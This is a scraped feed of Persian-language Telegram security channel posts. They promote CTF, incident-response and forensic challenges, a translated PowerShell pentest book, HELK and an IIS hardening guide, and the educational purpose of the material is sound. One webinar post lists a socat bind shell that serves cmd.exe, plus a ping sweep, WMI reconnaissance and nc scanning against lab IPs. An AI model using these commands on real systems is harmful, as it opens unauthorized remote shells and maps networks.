✅ پاورشل برای تست نفوذ - بخش پنجم
✔️ در این بخش به فصل پنجم از کتاب PowerShell for Penetration Testing با عنوان The WEB, REST, and SOAP می پردازیم.
🔴 شما می توانید از طریق لینک زیر ترجمه این فصل از کتاب را دانلود نمایید.
🌐 yun.ir/6ngu62
✔️ در این بخش به فصل پنجم از کتاب PowerShell for Penetration Testing با عنوان The WEB, REST, and SOAP می پردازیم.
🔴 شما می توانید از طریق لینک زیر ترجمه این فصل از کتاب را دانلود نمایید.
🌐 yun.ir/6ngu62
Forwarded from challenginno.ir
✔️ یکی واحدهای مهم که وجود آن در امنیت بسیار حائز اهمیت است، واحد پاسخگویی به حادثه یا Incident Response است.
✅ تیم Incident Response پس از بررسی های اولیه یک ویندوز 10 به این نتیجه می رسند که احتمالا فردی به این سیستم دسترسی گرفته و سیستم آلوده شده است. به همین دلیل لاگ های Security مربوط به این ویندوز را ذخیره می کنند.
✅ هم اکنون این فایل در اختیار شما قرار دارد و شما می بایست با بررسی این فایل لاگ به سوالات مطرح شده در چالش پاسخ دهید.
🔴 برای مشاهده پنجمین بخش از این مجموعه چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/incident-response-5
✅ تیم Incident Response پس از بررسی های اولیه یک ویندوز 10 به این نتیجه می رسند که احتمالا فردی به این سیستم دسترسی گرفته و سیستم آلوده شده است. به همین دلیل لاگ های Security مربوط به این ویندوز را ذخیره می کنند.
✅ هم اکنون این فایل در اختیار شما قرار دارد و شما می بایست با بررسی این فایل لاگ به سوالات مطرح شده در چالش پاسخ دهید.
🔴 برای مشاهده پنجمین بخش از این مجموعه چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/incident-response-5
securityworld
✔️ سلام و عرض ادب خدمت کلیه دوستان و همراهان گرامی ✅ امروز تعداد چالش های موجود در سایت به عدد 100 رسید. این موضوع قطعاً بدون همراهی شما دوستان عزیز امکان پذیر نبود. ✅ لذا بر خود لازم می دانیم که از همه دوستانی که در این راه با ما همراه بودند صمیمانه تشکر…
✔️ سلام و عرض ادب خدمت کلیه دوستان گرامی
✅ تخفیف 60 درصدی محصولات تنها تا پایان دی ماه اعتبار داشته و پس از آن با توجه به رویکرد جدید شرکت دهکده امن فناورانه صبا و وب سایت دنیای امنیت، محصولاتی که به صورت فیلم آموزشی در سایت قرار دارند حذف خواهند شد.
🔴 دوستانی که تمایل به خرید این محصولات دارند می توانند تا پایان دی ماه اقدام به خرید نمایند.
🔰 ممنون از لطف و همراهی همه دوستان گرامی
🌐 https://shop.securityworld.ir
✅ تخفیف 60 درصدی محصولات تنها تا پایان دی ماه اعتبار داشته و پس از آن با توجه به رویکرد جدید شرکت دهکده امن فناورانه صبا و وب سایت دنیای امنیت، محصولاتی که به صورت فیلم آموزشی در سایت قرار دارند حذف خواهند شد.
🔴 دوستانی که تمایل به خرید این محصولات دارند می توانند تا پایان دی ماه اقدام به خرید نمایند.
🔰 ممنون از لطف و همراهی همه دوستان گرامی
🌐 https://shop.securityworld.ir
Forwarded from challenginno.ir
✔️ رایت آپ مربوط به چالش سرویس های آسیب پذیر - شماره سه هم اکنون در سایت قرار داده شد.
✅ تمرکز این چالش بر روی ایجاد دسترسی اولیه از طریق آسیب پذیری های موجود بر روی سرویس ها می باشد.
🔴 برای مشاهده این رایت آپ به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/blog/initial-access-web-server-vulnerable-service
✅ تمرکز این چالش بر روی ایجاد دسترسی اولیه از طریق آسیب پذیری های موجود بر روی سرویس ها می باشد.
🔴 برای مشاهده این رایت آپ به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/blog/initial-access-web-server-vulnerable-service
Forwarded from challenginno.ir
✔️ در این چالش، شما با مجموعهای از ترافیک شبکه مواجه هستید که شامل چند مرحله است.
✅ دادههای موجود در فایل PCAP نشاندهنده یک جریان ارتباطی هستند که شامل تبادل دادهها و یک فایل پیوست است.
✅ وظیفه شما تحلیل دقیق این ترافیک و شناسایی یک فلگ مخفی در محتوای یکی از ارتباطات است.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/data-flow-analysis
✅ دادههای موجود در فایل PCAP نشاندهنده یک جریان ارتباطی هستند که شامل تبادل دادهها و یک فایل پیوست است.
✅ وظیفه شما تحلیل دقیق این ترافیک و شناسایی یک فلگ مخفی در محتوای یکی از ارتباطات است.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/data-flow-analysis
securityworld
✔️ سلام و عرض ادب خدمت کلیه دوستان و همراهان گرامی ✅ امروز تعداد چالش های موجود در سایت به عدد 100 رسید. این موضوع قطعاً بدون همراهی شما دوستان عزیز امکان پذیر نبود. ✅ لذا بر خود لازم می دانیم که از همه دوستانی که در این راه با ما همراه بودند صمیمانه تشکر…
ممنون از استقبال دوستان گرامی
امروز و فردا آخرین مهلت استفاده از تخفیف دوره های آموزشی سایت بوده و فیلم های آموزشی از سایت حذف خواهند شد.
ممنون از همه دوستان گرامی
امروز و فردا آخرین مهلت استفاده از تخفیف دوره های آموزشی سایت بوده و فیلم های آموزشی از سایت حذف خواهند شد.
ممنون از همه دوستان گرامی
Forwarded from challenginno.ir
✔️ سلام و عرض ادب خدمت کلیه دوستان و همراهان گرامی
✅ در راستای اهداف پلتفرم Challenginno، دومین رویداد Red/Blue Time در 16 بهمن ماه به صورت وبیناری برگزار خواهد شد.
✅ در بخش اول وبینار به بررسی برخی از حملات سمت کاربر و فرآیندهای Post Exploitation پرداخته شده و در بخش دوم به شناسایی حملات انجام شده خواهیم پرداخت.
🔴 این رویداد به صورت رایگان برگزار شده و شما می توانید برای ثبت نام در این رویداد به لینک زیر مراجعه نمایید.
https://evand.com/events/%D8%AF%D9%88%D9%85%DB%8C%D9%86-%D8%B1%D9%88%DB%8C%D8%AF%D8%A7%D8%AF-red-blue-time-%D8%B3%D8%A7%DB%8C%D8%AA-challenginno-ir-5880?icn=organizer&ici=1
✅ در راستای اهداف پلتفرم Challenginno، دومین رویداد Red/Blue Time در 16 بهمن ماه به صورت وبیناری برگزار خواهد شد.
✅ در بخش اول وبینار به بررسی برخی از حملات سمت کاربر و فرآیندهای Post Exploitation پرداخته شده و در بخش دوم به شناسایی حملات انجام شده خواهیم پرداخت.
🔴 این رویداد به صورت رایگان برگزار شده و شما می توانید برای ثبت نام در این رویداد به لینک زیر مراجعه نمایید.
https://evand.com/events/%D8%AF%D9%88%D9%85%DB%8C%D9%86-%D8%B1%D9%88%DB%8C%D8%AF%D8%A7%D8%AF-red-blue-time-%D8%B3%D8%A7%DB%8C%D8%AA-challenginno-ir-5880?icn=organizer&ici=1
Forwarded from challenginno.ir
✔️ پروتکل HTTP یکی از مهمترین پروتکلهای اینترنتی است که بهعنوان استانداردی برای انتقال دادهها بین کلاینت (مانند مرورگر وب) و سرور مورد استفاده قرار میگیرد.
✅ پروتکل HTTP در زمینه تست نفوذ وب اهمیت بسیار زیادی دارد، زیرا اساس ارتباطات در برنامههای وب است و درک دقیق آن برای شناسایی و بهرهبرداری از آسیبپذیریهای امنیتی ضروری است.
✅ در این چالش که به صورت پرسش و پاسخ طراحی شده است، قصد داریم تا شما را با پروتکل HTTP بیشتر آشنا نماییم.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/http-the-definitive-guide
✅ پروتکل HTTP در زمینه تست نفوذ وب اهمیت بسیار زیادی دارد، زیرا اساس ارتباطات در برنامههای وب است و درک دقیق آن برای شناسایی و بهرهبرداری از آسیبپذیریهای امنیتی ضروری است.
✅ در این چالش که به صورت پرسش و پاسخ طراحی شده است، قصد داریم تا شما را با پروتکل HTTP بیشتر آشنا نماییم.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/http-the-definitive-guide
Forwarded from challenginno.ir
✔️ پروتکل HTTP یکی از مهمترین پروتکلهای اینترنتی است که بهعنوان استانداردی برای انتقال دادهها بین کلاینت (مانند مرورگر وب) و سرور مورد استفاده قرار میگیرد.
✅ پروتکل HTTP در زمینه تست نفوذ وب اهمیت بسیار زیادی دارد، زیرا اساس ارتباطات در برنامههای وب است و درک دقیق آن برای شناسایی و بهرهبرداری از آسیبپذیریهای امنیتی ضروری است.
✅ در این چالش که به بخش دوم از مباحث مربوط به پروتکل HTTP می پردازیم.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/http-the-definitive-guide-2
✅ پروتکل HTTP در زمینه تست نفوذ وب اهمیت بسیار زیادی دارد، زیرا اساس ارتباطات در برنامههای وب است و درک دقیق آن برای شناسایی و بهرهبرداری از آسیبپذیریهای امنیتی ضروری است.
✅ در این چالش که به بخش دوم از مباحث مربوط به پروتکل HTTP می پردازیم.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/http-the-definitive-guide-2
Forwarded from challenginno.ir
✔️ یک تحلیلگر امنیتی در حال بررسی نفوذ مشکوک به سیستم Windows 10 است. کاربران گزارش دادهاند که فعالیتهای غیرعادی مشاهده کردهاند، اما هیچ برنامهای به طور واضح در حال اجرا نیست.
✅ شما یک دقیقۀ طلایی (Golden Minute) برای بررسی فایل حافظه و شناسایی تهدید دارید. مهاجم از فایل مخرب استفاده کرده است تا به سیستم دسترسی بگیرد.
✅ وظیفه شما این است که حافظه سیستم را بررسی نموده، فرآیند مخرب را شناسایی کنید و روش ارتباط آن را کشف نمایید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/memory-forensic
✅ شما یک دقیقۀ طلایی (Golden Minute) برای بررسی فایل حافظه و شناسایی تهدید دارید. مهاجم از فایل مخرب استفاده کرده است تا به سیستم دسترسی بگیرد.
✅ وظیفه شما این است که حافظه سیستم را بررسی نموده، فرآیند مخرب را شناسایی کنید و روش ارتباط آن را کشف نمایید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/memory-forensic
PowerShell for Pentest-Final.pdf
2.7 MB
✅ پاورشل به عنوان یک ابزار قدرتمند در سیستمعامل ویندوز، نه تنها برای مدیریت و خودکارسازی وظایف مدیریتی استفاده میشود، بلکه مورد توجه متخصصان امنیت نیز قرار گرفته است.
📌 در این کتاب، به بررسی روشهای مختلف تست نفوذ با پاورشل خواهیم پرداخت. از شناسایی و جمعآوری اطلاعات گرفته تا بهرهبرداری و Post-Exploitation، تکنیکهایی معرفی خواهند شد که به کارشناسان امنیت کمک میکنند تا نقاط ضعف شبکهها و سیستمها را شناسایی کرده و برای بهبود امنیت اقدام کنند.
🔰 لازم به ذکر است که مستند پیش رو، ترجمه بخشهایی از کتاب PowerShell for Penetration Testing نوشته Dr. Andrew Blyth است.
📌 در این کتاب، به بررسی روشهای مختلف تست نفوذ با پاورشل خواهیم پرداخت. از شناسایی و جمعآوری اطلاعات گرفته تا بهرهبرداری و Post-Exploitation، تکنیکهایی معرفی خواهند شد که به کارشناسان امنیت کمک میکنند تا نقاط ضعف شبکهها و سیستمها را شناسایی کرده و برای بهبود امنیت اقدام کنند.
🔰 لازم به ذکر است که مستند پیش رو، ترجمه بخشهایی از کتاب PowerShell for Penetration Testing نوشته Dr. Andrew Blyth است.
Forwarded from challenginno.ir
challenginno.ir
red-blue-02.wmv
✔️ سلام و عرض ادب خدمت کلیه دوستان و همراهان گرامی
✅ در راستای اهداف پلتفرم Challenginno، دومین رویداد Red/Blue Time در 16 بهمن ماه به صورت وبیناری برگزار شد.
✅ فیلم وبینار هم اکنون در دسترس دوستان می باشد.
🔴 ممنون از همه دوستان گرامی که در این وبینار حضور داشتند منتظر اخبار بعدی ما باشید
🌐https://t.iss.one/RedTeamAPT
🌐 https://challenginno.ir
✅ در راستای اهداف پلتفرم Challenginno، دومین رویداد Red/Blue Time در 16 بهمن ماه به صورت وبیناری برگزار شد.
✅ فیلم وبینار هم اکنون در دسترس دوستان می باشد.
🔴 ممنون از همه دوستان گرامی که در این وبینار حضور داشتند منتظر اخبار بعدی ما باشید
🌐https://t.iss.one/RedTeamAPT
🌐 https://challenginno.ir
Forwarded from challenginno.ir
challenginno.ir
red-blue-02.wmv
🔴 لیست دستورات مربوط به وبینار دوم Red/Blue Time
`socat - TCP4:192.168.141.157:4447 ---- > on kali with victim ip
--------
`socat -d -d TCP4-LISTEN:4447 EXEC:'cmd.exe',pipes ----> on victim
-----------
for /L %i in (1,1,254) do @ping -n 1 -w 100 192.168.141.%i | find "TTL="
------------
tracert 192.168.141.138
Resolve-DnsName "192.168.141.138"
wmic /node:"192.168.141.138" os get
Get-WmiObject -Class Win32_Share -ComputerName "192.168.141.138"
-------
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
wmic product get name
-------------
C:\Users\OMID\AppData\Roaming\MobaXterm\slash\bin
C:\Users\OMID\AppData\Roaming\MobaXterm\slash\etc\sessionsaliases.sh
`nc -zv 192.168.1.1 80-100`
`pktmon start --capture --comp nics --file-name C:\capture.etl`
`pktmon stop`
`pktmon format C:\capture.etl -o C:\capture.txt`
Forwarded from challenginno.ir
✔️ آسیبپذیری SQL Injection یکی از رایجترین و خطرناکترین نقاط ضعف امنیتی در برنامههای تحت وب است. این آسیب پذیری زمانی رخ میدهد که ورودیهای کاربر بهدرستی اعتبارسنجی یا فیلتر نشوند و مستقیماً در کوئریهای SQL استفاده شوند.
✅ در این چالش سعی شده است که به آسیبپذیری NoSQL Injection پرداخته شده و دیتابیس MongoDB در آن مورد بررسی قرار داده شود.
✅ این جالش شامل دو مرحله اکسپلویت آسیبپذیری به منظور شناسایی فلگ اول و اتصال به دیتابیس جهت استخراج اطلاعات و شناسایی فلگ دوم است.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/no-sqli-njection
✅ در این چالش سعی شده است که به آسیبپذیری NoSQL Injection پرداخته شده و دیتابیس MongoDB در آن مورد بررسی قرار داده شود.
✅ این جالش شامل دو مرحله اکسپلویت آسیبپذیری به منظور شناسایی فلگ اول و اتصال به دیتابیس جهت استخراج اطلاعات و شناسایی فلگ دوم است.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/no-sqli-njection
Forwarded from challenginno.ir
✔️ یکی واحدهای مهم که وجود آن در امنیت بسیار حائز اهمیت است، واحد پاسخگویی به حادثه یا Incident Response است.
✅ تیم Incident Response پس از بررسی های اولیه بر روی یک سیستم، به این نتیجه می رسد که احتمالا فردی به این سیستم دسترسی گرفته و سیستم آلوده شده است. همچنین برخی از شواهد نشان دهنده دسترسی نفوذگر به اطلاعات داخلی شبکه است. بدین منظور، تیم پاسخگویی به حادثه تصمیم می گیرد تا ترافیک ایجاد شده در یک بازه زمانی را بررسی نماید.
✅ هم اکنون فایل pcap ترافیک در اختیار شما قرار دارد و شما می بایست با بررسی این فایل به سوالات مطرح شده در چالش پاسخ دهید.
🔴 برای مشاهده ششمین بخش از این مجموعه چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/incident-response-6
✅ تیم Incident Response پس از بررسی های اولیه بر روی یک سیستم، به این نتیجه می رسد که احتمالا فردی به این سیستم دسترسی گرفته و سیستم آلوده شده است. همچنین برخی از شواهد نشان دهنده دسترسی نفوذگر به اطلاعات داخلی شبکه است. بدین منظور، تیم پاسخگویی به حادثه تصمیم می گیرد تا ترافیک ایجاد شده در یک بازه زمانی را بررسی نماید.
✅ هم اکنون فایل pcap ترافیک در اختیار شما قرار دارد و شما می بایست با بررسی این فایل به سوالات مطرح شده در چالش پاسخ دهید.
🔴 برای مشاهده ششمین بخش از این مجموعه چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/incident-response-6
Forwarded from challenginno.ir
✔️ یک سازمان بزرگ متوجه شده است که یکی از سرورهای ویندوزی آن، علائم فعالیت مشکوک دارد.
✅ تیم امنیتی متوجه شده که برخی از حسابهای کاربری دارای فعالیت غیرعادی هستند، اما هیچ نشانهای از بدافزار یا ابزارهای شناختهشده نفوذ وجود ندارد.
✅ وظیفهی شما این است که ردپای مهاجم را پیدا کنید، نحوهی ورود او را کشف کنید، و اقدامات او را تحلیل کنید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/windows-forensic/
✅ تیم امنیتی متوجه شده که برخی از حسابهای کاربری دارای فعالیت غیرعادی هستند، اما هیچ نشانهای از بدافزار یا ابزارهای شناختهشده نفوذ وجود ندارد.
✅ وظیفهی شما این است که ردپای مهاجم را پیدا کنید، نحوهی ورود او را کشف کنید، و اقدامات او را تحلیل کنید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/windows-forensic/
Forwarded from challenginno.ir
✔️ یک شرکت امنیتی متوجه میشود که یکی از کارمندانش که دارای سطح دسترسی بالای هست، فایلهای حساس را از سیستم خود پاک کرده است.
✅ تیم امنیتی باید مشخص کند که آیا فایلهای حذف شده بازیابیپذیر هستند یا خیر، چه اطلاعاتی در متادیتا باقی مانده و آیا نشانهای از مخفیسازی اطلاعات با استفاده از Alternate Data Streams (ADS) یا دیگر تکنیکها وجود دارد.
✅ برای حل این چالش شما می بایست تمامی شواهد در MFT، ADS، Prefetch، Event Logs و تغییرات متادیتا را بررسی نمایید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/for500
✅ تیم امنیتی باید مشخص کند که آیا فایلهای حذف شده بازیابیپذیر هستند یا خیر، چه اطلاعاتی در متادیتا باقی مانده و آیا نشانهای از مخفیسازی اطلاعات با استفاده از Alternate Data Streams (ADS) یا دیگر تکنیکها وجود دارد.
✅ برای حل این چالش شما می بایست تمامی شواهد در MFT، ADS، Prefetch، Event Logs و تغییرات متادیتا را بررسی نمایید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/for500
Forwarded from TolueAcademy
پلتفرم شکار تهدید HELK – یک راهکار متنباز برای تحلیل امنیتی پیشرفته
--------------------------------------
Hunting ELK (HELK) یکی از اولین پلتفرمهای متنباز برای شکار تهدیدات است که دارای قابلیتهای تحلیل پیشرفتهای مانند SQL، گرافسازی، استریم دادههای ساختاریافته، و یادگیری ماشین از طریق Jupyter Notebooks و Apache Spark بر روی ELK Stack میباشد. این پروژه ابتدا برای تحقیقات امنیتی توسعه یافت، اما به دلیل طراحی انعطافپذیر و اجزای اصلی آن، قابلیت استقرار در محیطهای سازمانی بزرگ را نیز دارد.
ویژگیهای کلیدی HELK
🔹 تحلیل دادههای امنیتی پیشرفته
پشتیبانی از SQL برای اجرای کوئریهای پیشرفته
گرافسازی و تحلیل بصری دادههای امنیتی
پردازش استریمینگ دادهها برای تحلیل لحظهای
🔹 یکپارچهسازی یادگیری ماشین
قابلیت توسعه مدلهای تشخیص ناهنجاری
🔹 شکار تهدیدات و تحلیل امنیتی
طراحیشده برای شناسایی و بررسی رفتارهای مشکوک مهاجمان
پشتیبانی از قوانین Sigma، چارچوب MITRE ATT&CK و زبان EQL
امکان ساخت و تنظیم قوانین امنیتی سفارشی
کسب اطلاعات بیشتر:
https://github.com/Cyb3rWard0g/HELK
--------------------------------------
Hunting ELK (HELK) یکی از اولین پلتفرمهای متنباز برای شکار تهدیدات است که دارای قابلیتهای تحلیل پیشرفتهای مانند SQL، گرافسازی، استریم دادههای ساختاریافته، و یادگیری ماشین از طریق Jupyter Notebooks و Apache Spark بر روی ELK Stack میباشد. این پروژه ابتدا برای تحقیقات امنیتی توسعه یافت، اما به دلیل طراحی انعطافپذیر و اجزای اصلی آن، قابلیت استقرار در محیطهای سازمانی بزرگ را نیز دارد.
ویژگیهای کلیدی HELK
🔹 تحلیل دادههای امنیتی پیشرفته
پشتیبانی از SQL برای اجرای کوئریهای پیشرفته
گرافسازی و تحلیل بصری دادههای امنیتی
پردازش استریمینگ دادهها برای تحلیل لحظهای
🔹 یکپارچهسازی یادگیری ماشین
قابلیت توسعه مدلهای تشخیص ناهنجاری
🔹 شکار تهدیدات و تحلیل امنیتی
طراحیشده برای شناسایی و بررسی رفتارهای مشکوک مهاجمان
پشتیبانی از قوانین Sigma، چارچوب MITRE ATT&CK و زبان EQL
امکان ساخت و تنظیم قوانین امنیتی سفارشی
کسب اطلاعات بیشتر:
https://github.com/Cyb3rWard0g/HELK
Forwarded from challenginno.ir
✔️ قسمت Authorization Testing یکی از بخشهای کلیدی در OWASP Web Security Testing Guide یا WSTG است که به بررسی و ارزیابی مکانیزمهای تعیین سطوح دسترسی و Authorization در برنامههای وب میپردازد.
✅ آسیبپذیری Bypassing Authorization Schema زمانی رخ میدهد که یک مهاجم بتواند با دور زدن مکانیزمهای کنترل دسترسی، به منابع یا عملکردهایی که نباید در دسترس او باشند، دسترسی پیدا کند.
✅ در این چالش که در سه مرحله ایجاد شده است، در هر مرحله شما باید به پنل ادمین برنامه دسترسی پیدا نموده و فلگ را از آن استخراج نمایید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/bypassing-authorization-schema
✅ آسیبپذیری Bypassing Authorization Schema زمانی رخ میدهد که یک مهاجم بتواند با دور زدن مکانیزمهای کنترل دسترسی، به منابع یا عملکردهایی که نباید در دسترس او باشند، دسترسی پیدا کند.
✅ در این چالش که در سه مرحله ایجاد شده است، در هر مرحله شما باید به پنل ادمین برنامه دسترسی پیدا نموده و فلگ را از آن استخراج نمایید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/bypassing-authorization-schema
✔️ مستند امنسازی IIS 10 بر اساس چارچوب CIS شامل مجموعهای از توصیهها و پیکربندیهای امنیتی است که به سازمانها کمک میکند تا سرور Microsoft IIS 10 خود را در برابر تهدیدات سایبری محافظت کنند.
✅ این راهنما شامل تنظیمات امنیتی پیشنهادی برای سرور وب، مدیریت هویت و دسترسی، لاگینگ و نظارت، و کاهش سطح حمله است.
✅ این مستند به عنوان یک استاندارد امنیتی شناختهشده، به مدیران شبکه و امنیت امکان میدهد تا IIS 10 را مطابق با بهترین شیوههای امنیتی تنظیم و ایمنسازی کنند.
🔴 برای تهیه این مستند که به صورت فارسی ایجاد شده است لینک زیر مراجعه نمایید:
🌐 yun.ir/9otg6d
✅ این راهنما شامل تنظیمات امنیتی پیشنهادی برای سرور وب، مدیریت هویت و دسترسی، لاگینگ و نظارت، و کاهش سطح حمله است.
✅ این مستند به عنوان یک استاندارد امنیتی شناختهشده، به مدیران شبکه و امنیت امکان میدهد تا IIS 10 را مطابق با بهترین شیوههای امنیتی تنظیم و ایمنسازی کنند.
🔴 برای تهیه این مستند که به صورت فارسی ایجاد شده است لینک زیر مراجعه نمایید:
🌐 yun.ir/9otg6d